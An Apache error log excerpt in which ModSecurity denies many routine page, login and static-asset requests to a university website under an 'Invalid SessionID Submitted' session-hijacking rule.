[Mon Aug 28 07:28:58.271735 2023] [:error] [pid 37808] [client 114.122.70.137] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOvqSsCo-f0AAJOwSWYAAAAH"]
[Mon Aug 28 07:29:18.471458 2023] [:error] [pid 37806] [client 114.122.70.137] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOvqXsCo-f0AAJOuUPYAAAAO"]
[Mon Aug 28 07:29:22.231394 2023] [:error] [pid 37312] [client 114.122.70.137] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOvqYsCo-f0AAJHAlTEAAAAY"]
[Mon Aug 28 07:30:23.655983 2023] [:error] [pid 37806] [client 123.253.233.84] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/index.php/c_mastah/grid_vstsemester"] [unique_id "ZOvqn8Co-f0AAJOuUQkAAAAO"]
[Mon Aug 28 07:30:24.173662 2023] [:error] [pid 37803] [client 123.253.233.84] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/index.php/c_tools/get_user"] [unique_id "ZOvqoMCo-f0AAJOr9hkAAAAL"]
[Mon Aug 28 07:31:54.407273 2023] [:error] [pid 37806] [client 66.249.70.7] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/js/bootstrap-datepicker.js"] [unique_id "ZOvq@sCo-f0AAJOuUR4AAAAO"]
[Mon Aug 28 07:31:55.052189 2023] [:error] [pid 37758] [client 66.249.70.7] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/css/unla.css"] [unique_id "ZOvq@8Co-f0AAJN@8MgAAAAE"]
[Mon Aug 28 07:31:55.493712 2023] [:error] [pid 37844] [client 66.249.70.8] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/js/bootstrap-datepicker.js"] [unique_id "ZOvq@8Co-f0AAJPUAYMAAAAA"]
[Mon Aug 28 07:40:27.891056 2023] [:error] [pid 37918] [client 180.244.128.165] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOvs@8Co-f0AAJQeRfAAAAAP"]
[Mon Aug 28 07:40:27.897537 2023] [:error] [pid 37758] [client 180.244.128.165] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/bootstrap.min.js"] [unique_id "ZOvs@8Co-f0AAJN@8RMAAAAE"]
[Mon Aug 28 07:40:27.899874 2023] [:error] [pid 37882] [client 180.244.128.165] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/js/bootstrap-datepicker.js"] [unique_id "ZOvs@8Co-f0AAJP6BLMAAAAM"]
[Mon Aug 28 07:40:27.901633 2023] [:error] [pid 37313] [client 180.244.128.165] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/logo-unla.png"] [unique_id "ZOvs@8Co-f0AAJHB5Z4AAAAD"]
[Mon Aug 28 07:40:27.902856 2023] [:error] [pid 38020] [client 180.244.128.165] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/logo-unla-mobile.png"] [unique_id "ZOvs@8Co-f0AAJSENWUAAAAH"]
[Mon Aug 28 07:40:27.906075 2023] [:error] [pid 38021] [client 180.244.128.165] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/pmb23.png"] [unique_id "ZOvs@8Co-f0AAJSFI3EAAAAI"]
[Mon Aug 28 07:40:27.910678 2023] [:error] [pid 37616] [client 180.244.128.165] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/wisuda_juni_2023.png"] [unique_id "ZOvs@8Co-f0AAJLwYOoAAAAB"]
[Mon Aug 28 07:40:27.918919 2023] [:error] [pid 37313] [client 180.244.128.165] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/rakerma_2023.png"] [unique_id "ZOvs@8Co-f0AAJHB5Z8AAAAD"]
[Mon Aug 28 07:40:27.921660 2023] [:error] [pid 37844] [client 180.244.128.165] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/fonts/glyphicons-halflings-regular.woff2"] [unique_id "ZOvs@8Co-f0AAJPUAesAAAAA"]
[Mon Aug 28 07:40:27.923595 2023] [:error] [pid 37758] [client 180.244.128.165] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/hibah_2023.png"] [unique_id "ZOvs@8Co-f0AAJN@8RQAAAAE"]
[Mon Aug 28 07:40:27.925475 2023] [:error] [pid 37616] [client 180.244.128.165] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fh-link.png"] [unique_id "ZOvs@8Co-f0AAJLwYOsAAAAB"]
[Mon Aug 28 07:40:27.927854 2023] [:error] [pid 37918] [client 180.244.128.165] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/dirpasca_2023.png"] [unique_id "ZOvs@8Co-f0AAJQeRfEAAAAP"]
[Mon Aug 28 07:40:27.936790 2023] [:error] [pid 37882] [client 180.244.128.165] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fe-link.png"] [unique_id "ZOvs@8Co-f0AAJP6BLQAAAAM"]
[Mon Aug 28 07:40:27.948883 2023] [:error] [pid 38021] [client 180.244.128.165] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fisip-link.png"] [unique_id "ZOvs@8Co-f0AAJSFI3IAAAAI"]
[Mon Aug 28 07:40:27.950862 2023] [:error] [pid 38020] [client 180.244.128.165] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOvs@8Co-f0AAJSENWYAAAAH"]
[Mon Aug 28 07:40:27.951600 2023] [:error] [pid 37313] [client 180.244.128.165] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fkip-link.png"] [unique_id "ZOvs@8Co-f0AAJHB5aAAAAAD"]
[Mon Aug 28 07:40:27.954977 2023] [:error] [pid 37844] [client 180.244.128.165] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/fonts/glyphicons-halflings-regular.woff"] [unique_id "ZOvs@8Co-f0AAJPUAewAAAAA"]
[Mon Aug 28 07:40:27.956892 2023] [:error] [pid 37758] [client 180.244.128.165] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/ft-link.png"] [unique_id "ZOvs@8Co-f0AAJN@8RUAAAAE"]
[Mon Aug 28 07:40:27.958354 2023] [:error] [pid 37918] [client 180.244.128.165] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/pasca-link.png"] [unique_id "ZOvs@8Co-f0AAJQeRfIAAAAP"]
[Mon Aug 28 07:40:27.972867 2023] [:error] [pid 37616] [client 180.244.128.165] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/akademik.png"] [unique_id "ZOvs@8Co-f0AAJLwYOwAAAAB"]
[Mon Aug 28 07:40:27.974858 2023] [:error] [pid 37882] [client 180.244.128.165] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/pendaftaran_online.png"] [unique_id "ZOvs@8Co-f0AAJP6BLUAAAAM"]
[Mon Aug 28 07:40:27.977659 2023] [:error] [pid 37313] [client 180.244.128.165] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/login-email-unla.png"] [unique_id "ZOvs@8Co-f0AAJHB5aEAAAAD"]
[Mon Aug 28 07:40:27.978621 2023] [:error] [pid 37918] [client 180.244.128.165] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/fonts/glyphicons-halflings-regular.ttf"] [unique_id "ZOvs@8Co-f0AAJQeRfMAAAAP"]
[Mon Aug 28 07:40:27.984960 2023] [:error] [pid 37844] [client 180.244.128.165] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/digilib-logo.png"] [unique_id "ZOvs@8Co-f0AAJPUAe0AAAAA"]
[Mon Aug 28 07:40:27.986915 2023] [:error] [pid 37758] [client 180.244.128.165] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/rekrut_dosen.jpg"] [unique_id "ZOvs@8Co-f0AAJN@8RYAAAAE"]
[Mon Aug 28 07:40:28.017115 2023] [:error] [pid 38021] [client 180.244.128.165] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvs-MCo-f0AAJSFI3MAAAAI"]
[Mon Aug 28 07:42:08.823145 2023] [:error] [pid 37882] [client 125.162.212.100] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOvtYMCo-f0AAJP6BMYAAAAM"]
[Mon Aug 28 07:42:08.824473 2023] [:error] [pid 37803] [client 125.162.212.100] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/logo-unla.png"] [unique_id "ZOvtYMCo-f0AAJOr9qAAAAAL"]
[Mon Aug 28 07:42:08.824472 2023] [:error] [pid 37844] [client 125.162.212.100] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/bootstrap.min.js"] [unique_id "ZOvtYMCo-f0AAJPUAgEAAAAA"]
[Mon Aug 28 07:42:08.824510 2023] [:error] [pid 37916] [client 125.162.212.100] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/js/bootstrap-datepicker.js"] [unique_id "ZOvtYMCo-f0AAJQcJ0EAAAAF"]
[Mon Aug 28 07:42:08.937657 2023] [:error] [pid 37616] [client 125.162.212.100] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/logo-unla-mobile.png"] [unique_id "ZOvtYMCo-f0AAJLwYP4AAAAB"]
[Mon Aug 28 07:42:09.104210 2023] [:error] [pid 38020] [client 125.162.212.100] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOvtYcCo-f0AAJSENXkAAAAH"]
[Mon Aug 28 07:42:09.450761 2023] [:error] [pid 37917] [client 125.162.212.100] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvtYcCo-f0AAJQdMRwAAAAJ"]
[Mon Aug 28 07:44:38.483400 2023] [:error] [pid 38020] [client 125.162.212.100] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/common-web/css/jquery.fancybox-1.3.4.css"] [unique_id "ZOvt9sCo-f0AAJSENYwAAAAH"]
[Mon Aug 28 07:44:38.484036 2023] [:error] [pid 37803] [client 125.162.212.100] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/common-web/css/style.css"] [unique_id "ZOvt9sCo-f0AAJOr9sIAAAAL"]
[Mon Aug 28 07:44:38.646933 2023] [:error] [pid 37916] [client 125.162.212.100] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/common-web/css/ddsmoothmenu.css"] [unique_id "ZOvt9sCo-f0AAJQcJ1YAAAAF"]
[Mon Aug 28 07:44:38.647138 2023] [:error] [pid 37616] [client 125.162.212.100] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/common-web/css/nivo-slider.css"] [unique_id "ZOvt9sCo-f0AAJLwYR4AAAAB"]
[Mon Aug 28 07:44:38.648858 2023] [:error] [pid 37539] [client 125.162.212.100] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/common-web/css/gallery_album.css"] [unique_id "ZOvt9sCo-f0AAJKjZx0AAAAG"]
[Mon Aug 28 07:44:38.686589 2023] [:error] [pid 37844] [client 125.162.212.100] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/common-web/css/reset-min.css"] [unique_id "ZOvt9sCo-f0AAJPUAh8AAAAA"]
[Mon Aug 28 07:44:38.712455 2023] [:error] [pid 38020] [client 125.162.212.100] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/js/ext/resources/css/ext-all.css"] [unique_id "ZOvt9sCo-f0AAJSENY0AAAAH"]
[Mon Aug 28 07:44:38.715469 2023] [:error] [pid 37803] [client 125.162.212.100] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/js/ext/resources/css/xtheme-gray.css"] [unique_id "ZOvt9sCo-f0AAJOr9sMAAAAL"]
[Mon Aug 28 07:44:39.015314 2023] [:error] [pid 37844] [client 125.162.212.100] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/js/ext/ux/data-view.css"] [unique_id "ZOvt98Co-f0AAJPUAiAAAAAA"]
[Mon Aug 28 07:44:39.015796 2023] [:error] [pid 37916] [client 125.162.212.100] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/js/ext/ux/css/Spinner.css"] [unique_id "ZOvt98Co-f0AAJQcJ1cAAAAF"]
[Mon Aug 28 07:44:39.018781 2023] [:error] [pid 37616] [client 125.162.212.100] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/css/examples.css"] [unique_id "ZOvt98Co-f0AAJLwYR8AAAAB"]
[Mon Aug 28 07:44:39.019070 2023] [:error] [pid 37539] [client 125.162.212.100] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/js/ext_plugins/statusbar/css/statusbar.css"] [unique_id "ZOvt98Co-f0AAJKjZx4AAAAG"]
[Mon Aug 28 07:44:39.019267 2023] [:error] [pid 37803] [client 125.162.212.100] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/js/ext/ux/fileuploadfield.css"] [unique_id "ZOvt98Co-f0AAJOr9sQAAAAL"]
[Mon Aug 28 07:44:39.021138 2023] [:error] [pid 38020] [client 125.162.212.100] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/css/tabs.css"] [unique_id "ZOvt98Co-f0AAJSENY4AAAAH"]
[Mon Aug 28 07:44:39.774977 2023] [:error] [pid 37803] [client 125.162.212.100] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/img/icons/silk.css"] [unique_id "ZOvt98Co-f0AAJOr9sUAAAAL"]
[Mon Aug 28 07:44:47.595083 2023] [:error] [pid 37882] [client 180.253.8.153] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOvt-8Co-f0AAJP6BOAAAAAM"]
[Mon Aug 28 07:44:47.825604 2023] [:error] [pid 38024] [client 180.253.8.153] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvt-8Co-f0AAJSIdwAAAAAK"]
[Mon Aug 28 07:45:04.811575 2023] [:error] [pid 38024] [client 180.253.8.153] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOvuEMCo-f0AAJSIdwMAAAAK"]
[Mon Aug 28 07:45:04.972147 2023] [:error] [pid 37916] [client 180.253.8.153] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvuEMCo-f0AAJQcJ1sAAAAF"]
[Mon Aug 28 07:45:10.968431 2023] [:error] [pid 37803] [client 103.138.230.61] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/bootstrap.min.css"] [unique_id "ZOvuFsCo-f0AAJOr9swAAAAL"]
[Mon Aug 28 07:45:10.986627 2023] [:error] [pid 37882] [client 103.138.230.61] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/logo-unla.png"] [unique_id "ZOvuFsCo-f0AAJP6BOYAAAAM"]
